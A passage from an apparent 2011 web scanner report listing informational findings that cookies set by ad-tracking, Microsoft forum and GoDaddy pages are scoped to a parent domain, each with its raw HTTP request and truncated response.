Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5364&nid=2046&expires=30&put=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rpb=7908%3D1%264940%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C; put_1994=vf1kj11kp2en

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%265364%3D1; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C2%2C%2C; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.52. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&rtb=uuid%3D4e394470-3e17-879f-6d77-411115d4b5ad HTTP/1.1
Host: r.openx.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: i=fbe566bc-e601-4d14-a2ef-601df1907cf9; p=1313437184

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 14:44:00 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=fbe566bc-e601-4d14-a2ef-601df1907cf9; expires=Mon, 02-Sep-2013 14:44:00 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.53. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scripts.omniture.com
Path:   /global/scripts/targeting/dyn_prop.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/targeting/dyn_prop.php HTTP/1.1
Host: scripts.omniture.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: s_cid=38212; s_iid=38573; cms_site_lang=1; offer_version=a%3A1%3A%7Bi%3A1057%3Bi%3A187%3B%7D; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1313976253453-233900.19#1316119783|check#true#1314910243|session#1314910182276-94505#1314912043; elqCustomerGUID=19ddb6ae-1941-431a-9104-41006951b164; campaign_stack=%5B%5B'38212'%2C'1313976267286'%5D%5D; b1=Logged%3A%20Banner%20Group%3A%20Search+Engine+Land+-+300x250+-+ROS; b2=Logged%3A%20Banner%3A%20300x250+-+2629+CV2; _jsuid=7264741388645661943; s_osc=14885; s_lv=1314806934818; s_vnum=1317398913538%26vn%3D1; v1stsp=552ED6C388FBA32B

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Sat, 03 Sep 2011 18:43:32 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 04 Oct 2010 17:31:59 GMT
xserver: www5.dmz
Content-Length: 482
Content-Type: application/javascript
Date: Sat, 03 Sep 2011 14:43:32 GMT
Connection: close
Set-Cookie: omniture_unique=6bcc0a791fca22f3e882adf94660e88c; path=/; domain=omniture.com
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

mboxCreate('omniTargetingInfo',
'profile.geo_ip=50.23.123.106',
'profile.geo_zip=75207',
'profile.geo_gmt_offset=-500',
'profile.geo_country=usa',
'profile.geo_country_code=840',
'profile.geo_region=t
...[SNIP]...

10.54. http://segment-pixel.invitemedia.com/set_partner_uid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=169&partnerUID=4e5e3f1ae3fd7427&sscs_active=1 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=e1c22076-53f3-4fd9-8356-2735bf06a66c; partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="; segments_p1="eJzjYuHY2M7IxcIx9wojAA9oAtg="; exchange_uid="eyI0IjogWyJDQUVTRVB4NVdCa2dwbTVNQ3pVRHd2TlVDNXciLCA3MzQzODNdfQ=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 03 Sep 2011 17:32:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 03-Sep-2011 17:32:02 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="; Domain=invitemedia.com; expires=Sun, 02-Sep-2012 17:32:22 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.55. http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.expression.microsoft.com
Path:   /Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6 HTTP/1.1
Host: social.expression.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:15 GMT; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:15 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB19
Date: Sat, 03 Sep 2011 12:58:15 GMT
Content-Length: 60480


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...

10.56. http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.expression.microsoft.com
Path:   /Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0 HTTP/1.1
Host: social.expression.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: msdn=L=1030; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:16 GMT; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1030; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:16 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB22
Date: Sat, 03 Sep 2011 12:58:15 GMT
Content-Length: 28901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...

10.57. http://static.getclicky.com/js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.getclicky.com
Path:   /js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js HTTP/1.1
Host: static.getclicky.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sat, 03 Sep 2011 13:15:11 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Last-Modified: Tue, 23 Aug 2011 01:10:54 GMT
Vary: Accept-Encoding
Expires: Sat, 10 Sep 2011 13:15:11 GMT
Cache-Control: max-age=604800
Set-Cookie: __cfduid=d1bed28fcd5cbef887c32392d5431dedf1315055711; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.getclicky.com
Set-Cookie: __cfduid=d1bed28fcd5cbef887c32392d5431dedf1315055711; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.static.getclicky.com
Content-Length: 9136

var clicky_obj=clicky_obj||(function(){var instance=null;function _ins(){var _self=this,site_ids=[],pageviews_fired=[],domain,secure,ref,ps_interval,ps_stop;this.init=function(site_id){site_ids.push(s
...[SNIP]...

10.58. http://www.godaddy.com/Payment/payment-options.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Payment/payment-options.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Payment/payment-options.aspx?ci=11266 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=4f057259-4645-4223-96aa-98d6262a1c68; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=; ASPSESSIONIDAATRCSST=DCJFEOKAIBECOFPMMBGNKPKK

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:07 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:07 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=6; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:26:07 GMT
Content-Length: 103730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

10.59. http://www.godaddy.com/affiliates/affiliate-program.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /affiliates/affiliate-program.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /affiliates/affiliate-program.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:25:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/affiliates/affiliate-program.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:25:55 GMT
Content-Length: 98753


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><
...[SNIP]...

10.60. http://www.godaddy.com/gdshop/offers/cross_sell.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /gdshop/offers/cross_sell.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; expires=Sun, 02-Sep-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB109&sitename=www%2Egodaddy%2Ecom&cookies=1&split=24&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&referringdomain=&referringpath=8d587be0%2D834e%2D4a03%2D83dc%2D2f3bcb783a40&shopper=46215684&querystring=ci%3D42031%26config%3Dssldefault; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:45:24 GMT
Content-Length: 271865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Low cost domain names, domain transfers, web hosting, em
...[SNIP]...

10.61. http://www.godaddy.com/shared/video/videos.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /shared/video/videos.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/video/videos.aspx?ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/affiliates/affiliate-program.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; pathway=4f057259-4645-4223-96aa-98d6262a1c68; ASPSESSIONIDAATRCSST=DCJFEOKAIBECOFPMMBGNKPKK; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=oemhlbvbcgufsjahmchddfndphwizcii; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=24; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:26:17 GMT
Content-Length: 27411

popUpFill({"Html":"\r\n\r\n\u003cscript src=\"http://img3.wsimg.com/fos/script/sales_tabs12.min.js\" type=\"text/javascript\"\u003e\u003c/script\u003e\r\n \r\n\r\n \u003ctable id=\"video_trigger\" ce
...[SNIP]...

10.62. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/JsonContent/GetMultiDomainsPlanList.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ssl/JsonContent/GetMultiDomainsPlanList.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Content-Length: 82
Origin: http://www.godaddy.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=ci=8346&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=&referringdomain=&split=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

planType=standard&domainsIndex=0&targetDivID=smulti_ddl_container&ddlID=smulti_ddl

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:29:25 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:29:25 GMT
Content-Length: 820

{"Html":"\r\n \u003cselect id=\"smulti_ddl\" class=\"t11 plan_ddl\"\u003e\r\n \u003coption value=\u00275710\u0027 \u003e1 Yr: $89.99/yr \u003c/option\u003e\u003coption value=\u00275718\u0027 \u003
...[SNIP]...

10.63. http://www.godaddy.com/ssl/ssl-certificates.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/ssl-certificates.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

